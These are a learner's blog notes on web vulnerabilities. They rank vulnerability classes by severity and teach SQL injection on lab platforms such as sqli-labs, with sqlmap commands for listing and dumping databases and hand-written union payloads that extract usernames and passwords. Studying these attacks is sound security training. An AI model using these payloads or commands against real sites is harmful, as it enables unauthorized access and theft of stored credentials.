Network Security Learning - Web vulnerabilities (Part 1)
2022-07-06 02:32:00 【haoaaao】
Note source: 11. WEB vulnerabilities: SQL injection knowledge points you must understand · Yuque (语雀)
(The blogger's notes are much more detailed; reading his is more useful than reading mine. I am borrowing them so they are handy for future review.)
I. Web vulnerability knowledge points you must understand
1. Common web vulnerabilities and their harm
(1) SQL injection
(2) XSS
(3) XXE
(4) File upload
(5) File inclusion
(6) File read
(7) CSRF (cross-site request forgery)
(8) SSRF (server-side request forgery)
(9) Deserialization
(10) Code execution
(11) Logic vulnerabilities
(12) Unauthorized access / sensitive information leakage
(13) Command execution
(14) Directory traversal
2. Severity tiers
(1) High-risk vulnerabilities:
SQL injection, file upload, file inclusion, code execution, unauthorized access, command execution.
Impact: they directly affect website permissions and database permissions, and an attacker can obtain the site's data or sensitive files. Loss of data security and loss of permissions is what makes these high risk.
(2) Medium-risk vulnerabilities:
Deserialization, logic flaws. (In practice a deserialization bug very often ends in code execution, in which case it is treated as high risk.)
(3) Low-risk vulnerabilities:
XSS, directory traversal, file read.
Impact: disclosure of website source code and of some of the site's accounts and passwords.
3. Where they show up
(Practice on the pikachu vulnerability training platform: download the source from GitHub and deploy it with phpStudy.)
CTF: SQL injection, file upload, deserialization, code execution;
SRC (vendor security response centers / bug bounty): vulnerabilities can appear even in images, and logic-security problems are common;
Red vs. blue exercises: the high-risk vulnerabilities are what matter: file upload, file inclusion, code execution, command execution.
II. SQL injection
1. SQL injection in brief
(1) How SQL injection arises:
1) User-supplied parameters are not strictly filtered (for example single and double quotes, angle brackets and so on are not removed or escaped) and are passed to the database for execution, which causes SQL injection;
2) the SQL statement is built by string concatenation.
Both conditions together are what matter: concatenation turns data into SQL syntax, and filtering is only a partial defence. Parameterized queries (prepared statements) remove the problem by never letting user input be parsed as SQL.
(2) Classification of SQL injection:
1) By technique: union-query injection, error-based injection, boolean-based blind injection, time-based (delay) blind injection, stacked-query injection.
2) By data type: string (character) type, where the input is wrapped in quotes inside the query and the attacker must close the quote; numeric type, where the input is not wrapped in quotes.
3) By injection position: GET data (submitted via GET, mostly visible in the address bar), POST data (submitted via POST, mostly from form inputs), HTTP headers (User-Agent, Referer, X-Forwarded-For and similar, when the application stores or logs them), cookie data.
(3) Hazards of SQL injection:
(4) Prerequisite knowledge
1) In MySQL 5.0 and above there is a built-in database named information_schema, which records all database names, table names and column names; querying it yields the table names or column names under a given database. (It only shows objects the current account has privileges on, so what you can enumerate depends on the privileges of the web application's database user.)
2) The "." symbol means "the next level down": xiaodi.user means the user table in the xiaodi database.
3) Parameters:
information_schema.tables: the table recording all table names
information_schema.columns: the table recording all column names
table_name: table name
column_name: column name
table_schema: database name
user(): the current MySQL login user
database(): the database currently in use
version(): the MySQL version
(5) Identifying the injection point
(6) SQL injection steps:
1) Injecting statements by hand
2) Using sqlmap
a) Get the database names
GET: python sqlmap.py -u "url" --cookie="" --dbs --batch
POST: python sqlmap.py -u "url" --cookie="" --data="payload" --dbs --batch
b) Get the table names
GET: python sqlmap.py -u "url" --cookie="" -D <database> --tables --batch
POST: python sqlmap.py -u "url" --cookie="" --data="payload" -D <database> --tables --batch
c) Dump the contents of a table
GET: python sqlmap.py -u "url" --cookie="" -D <database> -T <table> --dump --batch
POST: python sqlmap.py -u "url" --cookie="" --data="payload" -D <database> -T <table> --dump --batch
(--batch answers sqlmap's prompts with the defaults; --cookie is only needed when the target requires a logged-in session. For injection points in HTTP headers or cookies, save the raw request from a proxy and pass it with -r request.txt; cookie values are only tested from --level 2 and the User-Agent/Referer headers from --level 3.)
(7) Demonstration
(The sqli-labs platform is recommended for practice; it is dedicated to SQL injection.)
Method 1: injecting statements by hand
1) Testing:
Typing a special character (a single quote) into the page parameter produces a database error, which shows that the parameter reaches a database query and is an injection point. Trying a few variants shows that a single quote closes the string literal. A `#` typed into the URL starts the fragment and is never sent to the server, so it has to be URL-encoded as %23 to comment out the rest of the statement (MySQL also accepts "-- " with a trailing space).
2) ORDER BY to count the columns:
ORDER BY 3 returns normally and ORDER BY 4 errors, so the query returns 3 columns.
3) Union query for the database name (the original WHERE clause must match nothing, e.g. id=-1, otherwise the real row is displayed instead of the injected one):
-1' union select 1,2,3%23
The first column is not displayed on the page, so the database name is placed in column 2 or 3:
-1' union select 1,database(),3%23
4) Union query for the table names of the database:
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3%23
5) Query the sensitive columns of a table (filtering on table_schema as well avoids picking up a same-named table from another database; the subquery must be one of exactly 3 columns or the union fails):
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3%23
6) Finally read the sensitive data in those columns, such as username and password (0x3a is ':' and avoids needing another quote; group_concat output is truncated at group_concat_max_len, 1024 bytes by default, so large tables need LIMIT/OFFSET):
-1' union select 1,(select group_concat(username,0x3a,password) from users),3%23
2. MySQL injection
3. Injection by data type and submission method
4. Oracle, MongoDB and other database injection
5. Query methods and error-based / blind injection
6. Second-order, encoded, DNS and similar injection
7. Stacked queries and WAF bypass injection
8. sqlmap WAF bypass
III. File upload